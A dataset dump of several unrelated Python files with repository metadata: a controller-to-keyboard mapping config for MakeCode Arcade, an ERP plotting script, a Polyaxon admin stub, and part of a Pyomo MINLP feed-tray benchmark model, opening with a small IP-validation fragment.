return True
else:
dsz.ui.Echo('Invalid IP address', dsz.ERROR)
return False
return | 151.4375 | 2,042 | 0.463062 | 594 | 2,423 | 1.882155 | 0.106061 | 0.119857 | 0.214669 | 0.257603 | 0.772809 | 0.772809 | 0.761181 | 0.728086 | 0.728086 | 0.728086 | 0 | 0.171749 | 0.079653 | 2,423 | 16 | 2,043 | 151.4375 | 0.329596 | 0.084606 | 0 | 0 | 0 | 2.25 | 0.658228 | 0.648282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
aa433ef95de88ffaf01b5dea39ba1be8c43267cd | 8,338 | py | Python | McAirpos/uinput-mapper/configs/examples/arcade2_old.py | SuperPupperDoggo/McAirpos | e80c9504796da494e9d3ff79f0b26999afb5619e | [
"MIT"
] | null | null | null | McAirpos/uinput-mapper/configs/examples/arcade2_old.py | SuperPupperDoggo/McAirpos | e80c9504796da494e9d3ff79f0b26999afb5619e | [
"MIT"
] | null | null | null | McAirpos/uinput-mapper/configs/examples/arcade2_old.py | SuperPupperDoggo/McAirpos | e80c9504796da494e9d3ff79f0b26999afb5619e | [
"MIT"
] | null | null | null | from uinputmapper.cinput import *
"""
Configuration for many EV_ABS(axis) and EV_KEY(digital buttons) directional controllers
... as EV_KEY MakeCode Arcade keyboard device
"""
# Global variables
autoconf = 1 #Determines min and max for EV_ABS events automatically if 1, min and max must be set manually below if 0
deadzone = 0.25 #Deadzone in percentage before EV_ABS events react, used to dampen reactions to axis movements
# Variables for EV_ABS controller no. 1
invertUp = 0 #For inverting Y axis if 1, e.g. Nimbus SteelSeries controller
invertLeft = 0 #For inverting X axis if 1
max = 1 #Seed value = 1 for autoconf, if manual find properties using ./input-read -v -p /dev/input/eventX
min = 0 #Seed value = 0 for autoconf
mid = (min + max)/2
# Directional functions for EV_ABS controller no. 1
def digitizeUp(x):
global min, mid, max, deadzone
if x < min:
min = x
mid = (min + max)/2
if invertUp:
if x > (mid + (max - mid) * deadzone):
x = 1
else:
x = 0
else:
if x < (mid - (max - mid) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeDown(x):
global min, mid, max, deadzone
if x > max:
max = x
mid = (min + max)/2
if invertUp:
if x < (mid - (max - mid) * deadzone):
x = 1
else:
x = 0
else:
if x > (mid + (max - mid) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeLeft(x):
global min, mid, max, deadzone
if x < min:
min = x
mid = (min + max)/2
if invertLeft:
if x > (mid + (max - mid) * deadzone):
x = 1
else:
x = 0
else:
if x < (mid - (max - mid) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeRight(x):
global min, mid, max, deadzone
if x > max:
max = x
mid = (min + max)/2
if invertLeft:
if x < (mid - (max - mid) * deadzone):
x = 1
else:
x = 0
else:
if x > (mid + (max - mid) * deadzone):
x = 1
else:
x = 0
return int(x)
# Variables for EV_ABS controller no. 2
invertUp2 = 0 #For inverting Y axis if 1, e.g. Nimbus SteelSeries controller
invertLeft2 = 0 #For inverting X axis if 1
max2 = 1 #Seed value = 1 for autoconf, if manual find properties using ./input-read -v -p /dev/input/eventX
min2 = 0 #Seed value = 0 for autoconf
mid2 = (min + max)/2
# Directional functions for EV_ABS controller no. 2
def digitizeUp2(x):
global min2, mid2, max2, deadzone
if x < min2:
min2 = x
mid2 = (min2 + max2)/2
if invertUp2:
if x > (mid2 + (max2 - mid2) * deadzone):
x = 1
else:
x = 0
else:
if x < (mid2 - (max2 - mid2) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeDown2(x):
global min2, mid2, max2, deadzone
if x > max2:
max2 = x
mid2 = (min2 + max2)/2
if invertUp2:
if x < (mid2 - (max2 - mid2) * deadzone):
x = 1
else:
x = 0
else:
if x > (mid2 + (max2 - mid2) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeLeft2(x):
global min2, mid2, max2, deadzone
if x < min2:
min2 = x
mid2 = (min2 + max2)/2
if invertLeft2:
if x > (mid2 + (max2 - mid2) * deadzone):
x = 1
else:
x = 0
else:
if x < (mid2 - (max2 - mid2) * deadzone):
x = 1
else:
x = 0
return int(x)
def digitizeRight2(x):
global min2, mid2, max2, deadzone
if x > max2:
max2 = x
mid2 = (min2 + max2)/2
if invertLeft2:
if x < (mid2 - (max2 - mid2) * deadzone):
x = 1
else:
x = 0
else:
if x > (mid2 + (max2 - mid2) * deadzone):
x = 1
else:
x = 0
return int(x)
# Variables for EV_ABS HAT controllers
hmin = -1
hmax = 1
hmid = 0
# Directional functions for EV_ABS HAT controllers
def hat0Pos(x):
global hmin, hmid, hmax
if x > hmid:
x = 1
else:
x = 0
return int(x)
def hat0Neg(x):
global hmin, hmid, hmax
if x < hmid:
x = 1
else:
x = 0
return int(x)
# Button mapping config
config = {
# Controller no. 1
(0, EV_KEY): {
BTN_DPAD_UP: {
'type' : (0, EV_KEY),
'code' : 17,
'value' : None
},
BTN_DPAD_DOWN: {
'type' : (0, EV_KEY),
'code' : 31,
'value' : None
},
BTN_DPAD_LEFT: {
'type' : (0, EV_KEY),
'code' : 30,
'value' : None
},
BTN_DPAD_RIGHT: {
'type' : (0, EV_KEY),
'code' : 32,
'value' : None
},
BTN_SOUTH: {
'type' : (0, EV_KEY),
'code' : 29,
'value' : None
},
BTN_B: {
'type' : (0, EV_KEY),
'code' : 42,
'value' : None
},
BTN_START: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : None
},
BTN_SELECT: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : None
},
BTN_MODE: {
'type' : (0, EV_KEY),
'code' : 60,
'value' : None
},
},
(0, EV_ABS): {
ABS_X: {
'type' : (0, EV_KEY),
'code' : 30,
'value' : digitizeLeft
},
ABS_Y: {
'type' : (0, EV_KEY),
'code' : 17,
'value' : digitizeUp
},
ABS_HAT0X: {
'type' : (0, EV_KEY),
'code' : 32,
'value' : hat0Pos
},
ABS_HAT0Y: {
'type' : (0, EV_KEY),
'code' : 31,
'value' : hat0Pos
}
},
(1, EV_KEY): {
BTN_THUMB: {
'type' : (0, EV_KEY),
'code' : 29,
'value' : None
},
BTN_THUMB2: {
'type' : (0, EV_KEY),
'code' : 42,
'value' : None
},
BTN_BASE4: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : None
},
BTN_BASE3: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : None
},
KEY_HOMEPAGE: {
'type' : (0, EV_KEY),
'code' : 60,
'value' : None
}
},
(1, EV_ABS): {
ABS_X: {
'type' : (0, EV_KEY),
'code' : 32,
'value' : digitizeRight
},
ABS_Y: {
'type' : (0, EV_KEY),
'code' : 31,
'value' : digitizeDown
},
ABS_Z: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : hat0Pos
},
ABS_RZ: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : hat0Pos
},
ABS_HAT0X: {
'type' : (0, EV_KEY),
'code' : 30,
'value' : hat0Neg
},
ABS_HAT0Y: {
'type' : (0, EV_KEY),
'code' : 17,
'value' : hat0Neg
}
},
# Controller no. 2
(2, EV_KEY): {
BTN_DPAD_UP: {
'type' : (0, EV_KEY),
'code' : 103,
'value' : None
},
BTN_DPAD_DOWN: {
'type' : (0, EV_KEY),
'code' : 108,
'value' : None
},
BTN_DPAD_LEFT: {
'type' : (0, EV_KEY),
'code' : 105,
'value' : None
},
BTN_DPAD_RIGHT: {
'type' : (0, EV_KEY),
'code' : 106,
'value' : None
},
BTN_SOUTH: {
'type' : (0, EV_KEY),
'code' : 100,
'value' : None
},
BTN_B: {
'type' : (0, EV_KEY),
'code' : 57,
'value' : None
},
BTN_START: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : None
},
BTN_SELECT: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : None
},
BTN_MODE: {
'type' : (0, EV_KEY),
'code' : 60,
'value' : None
},
},
(2, EV_ABS): {
ABS_X: {
'type' : (0, EV_KEY),
'code' : 105,
'value' : digitizeLeft2
},
ABS_Y: {
'type' : (0, EV_KEY),
'code' : 103,
'value' : digitizeUp2
},
ABS_HAT0X: {
'type' : (0, EV_KEY),
'code' : 106,
'value' : hat0Pos
},
ABS_HAT0Y: {
'type' : (0, EV_KEY),
'code' : 108,
'value' : hat0Pos
}
},
(3, EV_KEY): {
BTN_THUMB: {
'type' : (0, EV_KEY),
'code' : 100,
'value' : None
},
BTN_THUMB2: {
'type' : (0, EV_KEY),
'code' : 57,
'value' : None
},
BTN_BASE4: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : None
},
BTN_BASE3: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : None
},
KEY_HOMEPAGE: {
'type' : (0, EV_KEY),
'code' : 60,
'value' : None
}
},
(3, EV_ABS): {
ABS_X: {
'type' : (0, EV_KEY),
'code' : 106,
'value' : digitizeRight2
},
ABS_Y: {
'type' : (0, EV_KEY),
'code' : 108,
'value' : digitizeDown2
},
ABS_Z: {
'type' : (0, EV_KEY),
'code' : 1,
'value' : hat0Pos
},
ABS_RZ: {
'type' : (0, EV_KEY),
'code' : 59,
'value' : hat0Pos
},
ABS_HAT0X: {
'type' : (0, EV_KEY),
'code' : 105,
'value' : hat0Neg
},
ABS_HAT0Y: {
'type' : (0, EV_KEY),
'code' : 103,
'value' : hat0Neg
}
}
}
names = {
0 : 'MakeCode_Arcade'
}
def config_merge(c, n):
c.clear()
c.update(config)
n.update(names)
| 17.298755 | 118 | 0.506117 | 1,153 | 8,338 | 3.551605 | 0.124892 | 0.065934 | 0.071795 | 0.117216 | 0.809768 | 0.796093 | 0.774359 | 0.706471 | 0.706471 | 0.588523 | 0 | 0.060417 | 0.327057 | 8,338 | 481 | 119 | 17.334719 | 0.669399 | 0.114056 | 0 | 0.744681 | 0 | 0 | 0.088443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.002364 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aa47ef77f2f06b39a0e162e7ce1ed73ca555888c | 3,443 | py | Python | generate_SuppFigSI2.py | haribharadwaj/PLOSBiol_ASD_ObjectFormation | 5ea164876b00b3d11965e7f4a443abbfcfa7b252 | [
"BSD-3-Clause"
] | null | null | null | generate_SuppFigSI2.py | haribharadwaj/PLOSBiol_ASD_ObjectFormation | 5ea164876b00b3d11965e7f4a443abbfcfa7b252 | [
"BSD-3-Clause"
] | null | null | null | generate_SuppFigSI2.py | haribharadwaj/PLOSBiol_ASD_ObjectFormation | 5ea164876b00b3d11965e7f4a443abbfcfa7b252 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
from scipy import io
import numpy as np
import pylab as pl
fname = 'ERPsummary_zscore_left.mat'
dat = io.loadmat(fname)
t = dat['t'].flatten()
c6 = dat['c6']
c12 = dat['c12']
c18 = dat['c18']
peak = 'combined'
start, stop = (0.05, 0.44)
pl.subplot(1, 2, 1)
s6 = c6[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s12 = c12[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s18 = c18[:, np.logical_and(t > start, t < stop)].mean(axis=1)
# TD-left
x = np.asarray([5.75, 11.75, 17.75])
y = np.asarray([s6[:26].mean(), s12[:26].mean(), s18[:26].mean()])
yerr = np.asarray([s6[:26].std() / (26 ** 0.5), s12[:26].std() / (26 ** 0.5),
s18[:26].std() / (26 ** 0.5)])
pl.errorbar(x, y, yerr,
fmt='ob-', elinewidth=2)
fname = 'ERPsummary_zscore_right.mat'
dat = io.loadmat(fname)
t = dat['t'].flatten()
c6 = dat['c6']
c12 = dat['c12']
c18 = dat['c18']
peak = 'combined'
start, stop = (0.05, 0.44)
# TD-right
s6 = c6[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s12 = c12[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s18 = c18[:, np.logical_and(t > start, t < stop)].mean(axis=1)
x = np.asarray([5.75, 11.75, 17.75])
x = x + 0.5
y = np.asarray([s6[:26].mean(), s12[:26].mean(), s18[:26].mean()])
yerr = np.asarray([s6[:26].std() / (26 ** 0.5), s12[:26].std() / (26 ** 0.5),
s18[:26].std() / (26 ** 0.5)])
pl.errorbar(x, y, yerr,
fmt='ob--', elinewidth=2)
pl.xlabel('Number of Coherent Tones', fontsize=16)
pl.ylabel('Evoked Response (normalized)', fontsize=16)
pl.xticks((6, 12, 18))
pl.ylim((1.0, 4.25))
ax = pl.gca()
ax.tick_params(labelsize=14)
pl.legend(('Left', 'Right'), loc='upper left')
## LOAD DATA AGAIN FOR ASD
fname = 'ERPsummary_zscore_left.mat'
dat = io.loadmat(fname)
t = dat['t'].flatten()
c6 = dat['c6']
c12 = dat['c12']
c18 = dat['c18']
peak = 'combined'
start, stop = (0.05, 0.44)
pl.subplot(1, 2, 2)
s6 = c6[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s12 = c12[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s18 = c18[:, np.logical_and(t > start, t < stop)].mean(axis=1)
# ASD-left
y = np.asarray([s6[26:].mean(), s12[26:].mean(), s18[26:].mean()])
yerr = np.asarray([s6[26:].std() / (21 ** 0.5), s12[26:].std() / (21 ** 0.5),
s18[26:].std() / (21 ** 0.5)])
pl.errorbar(x, y, yerr,
fmt='sr-', elinewidth=2)
pl.xlabel('Number of Coherent Tones', fontsize=16)
pl.xticks((6, 12, 18))
ax = pl.gca()
ax.tick_params(labelsize=14)
pl.legend(('Left', 'Right'), loc='upper left')
# ASD-right
fname = 'ERPsummary_zscore_right.mat'
dat = io.loadmat(fname)
t = dat['t'].flatten()
c6 = dat['c6']
c12 = dat['c12']
c18 = dat['c18']
peak = 'combined'
start, stop = (0.05, 0.44)
s6 = c6[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s12 = c12[:, np.logical_and(t > start, t < stop)].mean(axis=1)
s18 = c18[:, np.logical_and(t > start, t < stop)].mean(axis=1)
x = x + 0.5
y = np.asarray([s6[26:].mean(), s12[26:].mean(), s18[26:].mean()])
yerr = np.asarray([s6[26:].std() / (21 ** 0.5), s12[26:].std() / (21 ** 0.5),
s18[26:].std() / (21 ** 0.5)])
pl.errorbar(x, y, yerr,
fmt='sr--', elinewidth=2)
pl.xlabel('Number of Coherent Tones', fontsize=16)
pl.xticks((6, 12, 18))
pl.ylim((1.0, 4.25))
ax = pl.gca()
ax.tick_params(labelsize=14)
pl.legend(('Left', 'Right'), loc='upper left') | 28.454545 | 77 | 0.576823 | 607 | 3,443 | 3.233937 | 0.163097 | 0.014264 | 0.073357 | 0.07947 | 0.91136 | 0.91136 | 0.91136 | 0.91136 | 0.91136 | 0.890474 | 0 | 0.114806 | 0.1702 | 3,443 | 121 | 78 | 28.454545 | 0.572279 | 0.037758 | 0 | 0.89011 | 0 | 0 | 0.104545 | 0.032121 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.032967 | 0 | 0.032967 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a4aec5dd684dda9a572d81d962dc90ee8ac6f044 | 102 | py | Python | platform/core/polyaxon/administration/register/bookmarks.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | platform/core/polyaxon/administration/register/bookmarks.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | platform/core/polyaxon/administration/register/bookmarks.py | hackerwins/polyaxon | ff56a098283ca872abfbaae6ba8abba479ffa394 | [
"Apache-2.0"
] | null | null | null | from db.models.bookmarks import Bookmark
def register(admin_register):
admin_register(Bookmark)
| 17 | 40 | 0.803922 | 13 | 102 | 6.153846 | 0.692308 | 0.325 | 0.525 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127451 | 102 | 5 | 41 | 20.4 | 0.898876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
351f066654a5643bb7ab624ad7f0f5022e4f331f | 36,074 | py | Python | models_nonconvex_simple2/feedtray2.py | grossmann-group/pyomo-MINLP-benchmarking | 714f0a0dffd61675649a805683c0627af6b4929e | [
"MIT"
] | null | null | null | models_nonconvex_simple2/feedtray2.py | grossmann-group/pyomo-MINLP-benchmarking | 714f0a0dffd61675649a805683c0627af6b4929e | [
"MIT"
] | null | null | null | models_nonconvex_simple2/feedtray2.py | grossmann-group/pyomo-MINLP-benchmarking | 714f0a0dffd61675649a805683c0627af6b4929e | [
"MIT"
] | null | null | null | # MINLP written by GAMS Convert at 08/20/20 01:30:43
#
# Equation counts
# Total E G L N X C B
# 284 7 114 163 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 88 52 36 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 1627 685 942 0
from pyomo.environ import *
model = m = ConcreteModel()
m.b1 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b2 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b3 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b4 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b5 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b6 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b7 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b8 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b9 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b10 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b11 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b12 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b13 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b14 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b15 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b16 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b17 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b18 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b19 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b20 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b21 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b22 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b23 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b24 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b25 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b26 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b27 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b28 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b29 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b30 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b31 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b32 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b33 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b34 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b35 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b36 = Var(within=Binary,bounds=(0,1),initialize=0)
m.x37 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x38 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x39 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x40 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x41 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x42 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x43 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x44 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x45 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x46 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x47 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x48 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x49 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x50 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x51 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x52 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x53 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x54 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x55 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x56 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x57 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x58 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x59 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x60 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x61 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x62 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x63 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x64 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x65 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x66 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x67 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x68 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x69 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x70 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x71 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x72 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x73 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x74 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x75 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x76 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x77 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x78 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x79 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x80 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x81 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x84 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x85 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x86 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x87 = Var(within=Reals,bounds=(0,100),initialize=0)
m.x88 = Var(within=Reals,bounds=(0,5),initialize=0)
m.obj = Objective(expr=m.x88, sense=minimize)
m.c1 = Constraint(expr=m.x87*m.x61 + 1000*m.b1 <= 1000.024)
m.c2 = Constraint(expr=m.x87*m.x63 + 1000*m.b2 <= 1000.024)
m.c3 = Constraint(expr=m.x87*m.x65 + 1000*m.b3 <= 1000.024)
m.c4 = Constraint(expr=m.x87*m.x67 + 1000*m.b4 <= 1000.024)
m.c5 = Constraint(expr=m.x87*m.x69 + 1000*m.b5 <= 1000.024)
m.c6 = Constraint(expr=m.x87*m.x71 + 1000*m.b6 <= 1000.024)
m.c7 = Constraint(expr=m.x87*m.x73 + 1000*m.b7 <= 1000.024)
m.c8 = Constraint(expr=m.x87*m.x75 + 1000*m.b8 <= 1000.024)
m.c9 = Constraint(expr=m.x87*m.x77 + 1000*m.b9 <= 1000.024)
m.c10 = Constraint(expr=m.x87*m.x79 + 1000*m.b10 <= 1000.024)
m.c11 = Constraint(expr=m.x87*m.x81 + 1000*m.b11 <= 1000.024)
m.c12 = Constraint(expr=m.x87*m.x83 + 1000*m.b12 <= 1000.024)
m.c13 = Constraint(expr=(100*m.b14 + 100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21
+ 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x39 + m.x86*m.x63 - (100*m.b15 + 100*m.b16 + 100
*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x41 - m.x86*m.x61 - 80*m.b14 - 1000*m.b2 + 1000*m.b26 <= 1000)
m.c14 = Constraint(expr=(100*m.b14 + 100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21
+ 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x40 + m.x86*m.x64 - (100*m.b15 + 100*m.b16 + 100
*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x42 - m.x86*m.x62 - 20*m.b14 - 1000*m.b2 + 1000*m.b26 <= 1000)
m.c15 = Constraint(expr=(100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22
+ 100*m.b23 + 100*m.b24 + m.x85)*m.x41 + m.x86*m.x65 - (100*m.b16 + 100*m.b17 + 100*m.b18 + 100
*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x43 - m.x86*m.x63
- 80*m.b15 - 1000*m.b3 + 1000*m.b27 <= 1000)
m.c16 = Constraint(expr=(100*m.b15 + 100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22
+ 100*m.b23 + 100*m.b24 + m.x85)*m.x42 + m.x86*m.x66 - (100*m.b16 + 100*m.b17 + 100*m.b18 + 100
*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x44 - m.x86*m.x64
- 20*m.b15 - 1000*m.b3 + 1000*m.b27 <= 1000)
m.c17 = Constraint(expr=(100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23
+ 100*m.b24 + m.x85)*m.x43 + m.x86*m.x67 - (100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100
*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x45 - m.x86*m.x65 - 80*m.b16 - 1000*m.b4
+ 1000*m.b28 <= 1000)
m.c18 = Constraint(expr=(100*m.b16 + 100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23
+ 100*m.b24 + m.x85)*m.x44 + m.x86*m.x68 - (100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100
*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*m.x46 - m.x86*m.x66 - 20*m.b16 - 1000*m.b4
+ 1000*m.b28 <= 1000)
m.c19 = Constraint(expr=(100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24
+ m.x85)*m.x45 + m.x86*m.x69 - (100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100
*m.b23 + 100*m.b24 + m.x85)*m.x47 - m.x86*m.x67 - 80*m.b17 - 1000*m.b5 + 1000*m.b29 <= 1000)
m.c20 = Constraint(expr=(100*m.b17 + 100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24
+ m.x85)*m.x46 + m.x86*m.x70 - (100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100
*m.b23 + 100*m.b24 + m.x85)*m.x48 - m.x86*m.x68 - 20*m.b17 - 1000*m.b5 + 1000*m.b29 <= 1000)
m.c21 = Constraint(expr=(100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*
m.x47 + m.x86*m.x71 - (100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x49 - m.x86*m.x69 - 80*m.b18 - 1000*m.b6 + 1000*m.b30 <= 1000)
m.c22 = Constraint(expr=(100*m.b18 + 100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 + m.x85)*
m.x48 + m.x86*m.x72 - (100*m.b19 + 100*m.b20 + 100*m.b21 + 100*m.b22 + 100*m.b23 + 100*m.b24 +
m.x85)*m.x50 - m.x86*m.x70 - 20*m.b18 - 1000*m.b6 + 1000*m.b30 <= 1000)
